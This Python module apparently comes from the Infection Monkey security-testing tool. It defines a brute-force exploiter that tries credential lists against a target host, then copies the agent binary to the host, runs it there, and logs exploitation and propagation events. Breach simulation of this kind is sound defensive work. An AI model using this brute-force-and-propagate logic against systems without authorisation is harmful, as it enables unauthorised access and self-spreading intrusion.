import logging
from contextlib import suppress
from pathlib import PurePath
from time import time
from typing import Callable, Iterable, Set

from common import OperatingSystem
from common.agent_events import AgentEventTag, ExploitationEvent, PropagationEvent
from common.credentials import Credentials
from common.event_queue import IAgentEventPublisher
from common.types import AgentID, Event
from infection_monkey.exploit import IAgentBinaryRepository
from infection_monkey.i_puppet import ExploiterResult, TargetHost
from infection_monkey.utils.threading import interruptible_iter

from . import (
    IRemoteAccessClient,
    IRemoteAccessClientFactory,
    RemoteAuthenticationError,
    RemoteCommandExecutionError,
    RemoteFileCopyError,
)

logger = logging.getLogger(__name__)


class BruteForceExploiter:
    """
    An exploiter that brute-forces credentials and propagates the Monkey agent

    Operates on any exploit client that implements `IRemoteAccessClient`. An
    instance of `IRemoteAccessClientFactory` must be provided to create the
    exploit client.
    """

    def __init__(
        self,
        exploiter_name: str,
        agent_id: AgentID,
        destination_path: PurePath,
        exploit_client_factory: IRemoteAccessClientFactory,
        get_credentials: Callable[[], Iterable[Credentials]],
        agent_binary_repository: IAgentBinaryRepository,
        agent_event_publisher: IAgentEventPublisher,
        tags: Set[AgentEventTag],
    ):
        """
        :param exploiter_name: The name of the exploiter
        :param agent_id: The ID of the agent that is running this exploiter
        :param destination_path: The destination path into which copy the agent
        :param exploit_client_factory: A factory that creates the exploit client
        :param get_credentials: A function that provides credentials for brute-forcing
        :param agent_binary_repository: A repository that provides the agent binary
        :param agent_event_publisher: A publisher that publishes agent events
        :param tags: Tags to add to the agent events
        """
        self._exploiter_name = exploiter_name
        self._agent_id = agent_id
        self._destination_path = destination_path
        self._exploit_client_factory = exploit_client_factory
        self._get_credentials = get_credentials
        self._agent_binary_repository = agent_binary_repository
        self._agent_event_publisher = agent_event_publisher
        self._tags = tags

    def exploit_host(
        self,
        host: TargetHost,
        interrupt: Event,
    ) -> ExploiterResult:
        """
        Exploits the given host and propagates the Monkey agent

        :param host: The host to exploit
        :param interrupt: An event that can be set to interrupt the exploit
        :return: The result of the exploit
        """
        if interrupt.is_set():
            return ExploiterResult()

        exploit_client = self._exploit_client_factory.create()

        try:
            self._exploit(exploit_client, host, interrupt)
        except Exception as err:
            logger.exception(f"Failed to exploit {host.ip}: {err}")
            return ExploiterResult(exploitation_success=False, propagation_success=False)

        try:
            self._propagate(exploit_client, host, interrupt)
            return ExploiterResult(exploitation_success=True, propagation_success=True)
        except Exception as err:
            logger.exception(f"Failed to propagate to {host.ip}: {err}")
            return ExploiterResult(exploitation_success=True, propagation_success=False)

    def _exploit(self, exploit_client: IRemoteAccessClient, host: TargetHost, interrupt: Event):
        credential_combinations = self._get_credentials()

        for brute_force_credentials in interruptible_iter(credential_combinations, interrupt):
            tags: Set[AgentEventTag] = set()
            timestamp = time()
            try:
                exploit_client.login(brute_force_credentials, tags)
                self._publish_exploitation_event(
                    host, success=True, time=timestamp, tags=self._tags.union(tags)
                )
                return
            except RemoteAuthenticationError as err:
                self._publish_exploitation_event(
                    host,
                    success=False,
                    time=timestamp,
                    tags=self._tags.union(tags),
                    error_message=str(err),
                )
                continue

        raise Exception("Failed to login with the given credentials")

    def _propagate(
        self,
        exploit_client: IRemoteAccessClient,
        host: TargetHost,
        interrupt: Event,
    ):
        target_host_os = exploit_client.get_os()
        copy_file_tags: Set[AgentEventTag] = set()
        execute_agent_tags: Set[AgentEventTag] = set()
        timestamp = time()

        try:
            file_path = self._copy_agent_binary(
                target_host_os, self._destination_path, copy_file_tags, exploit_client, interrupt
            )
            exploit_client.execute_agent(file_path, execute_agent_tags)
        except (RemoteFileCopyError, RemoteCommandExecutionError) as err:
            self._publish_propagation_event(
                host,
                success=False,
                time=timestamp,
                tags=self._tags.union(copy_file_tags, execute_agent_tags),
                error_message=str(err),
            )
            raise err

        self._publish_propagation_event(
            host,
            success=True,
            time=timestamp,
            tags=self._tags.union(copy_file_tags, execute_agent_tags),
        )

    def _copy_agent_binary(
        self,
        target_host_os: OperatingSystem,
        destination: PurePath,
        tags: Set[AgentEventTag],
        exploit_client: IRemoteAccessClient,
        interrupt: Event,
    ) -> PurePath:
        agent_binary = self._agent_binary_repository.get_agent_binary(target_host_os)
        agent_binary_bytes = agent_binary.getvalue()

        with suppress(RemoteFileCopyError):
            logger.debug(f"Attempting to copy agent binary to {destination}")
            exploit_client.copy_file(agent_binary_bytes, destination, tags)
            return destination

        other_destinations = exploit_client.get_writable_paths()
        logger.debug(f"Using file name: {destination.name}")
        for other_destination in interruptible_iter(other_destinations, interrupt):
            destination_path = other_destination / destination.name
            with suppress(RemoteFileCopyError):
                logger.debug(f"Attempting to copy agent binary to {destination_path}")
                exploit_client.copy_file(agent_binary_bytes, destination_path, tags)
                return destination_path

        raise RemoteFileCopyError("Failed to copy file")

    def _publish_exploitation_event(
        self,
        target_host: TargetHost,
        time: float,
        success: bool = False,
        tags: Set[AgentEventTag] = set(),
        error_message: str = "",
    ):
        exploitation_event = ExploitationEvent(
            source=self._agent_id,
            target=target_host.ip,
            success=success,
            exploiter_name=self._exploiter_name,
            error_message=error_message,
            timestamp=time,
            tags=frozenset(tags),
        )
        self._agent_event_publisher.publish(exploitation_event)

    def _publish_propagation_event(
        self,
        target_host: TargetHost,
        time: float,
        success: bool = False,
        tags: Set[AgentEventTag] = set(),
        error_message: str = "",
    ):
        propagation_event = PropagationEvent(
            source=self._agent_id,
            target=target_host.ip,
            success=success,
            exploiter_name=self._exploiter_name,
            error_message=error_message,
            timestamp=time,
            tags=frozenset(tags),
        )
        self._agent_event_publisher.publish(propagation_event)
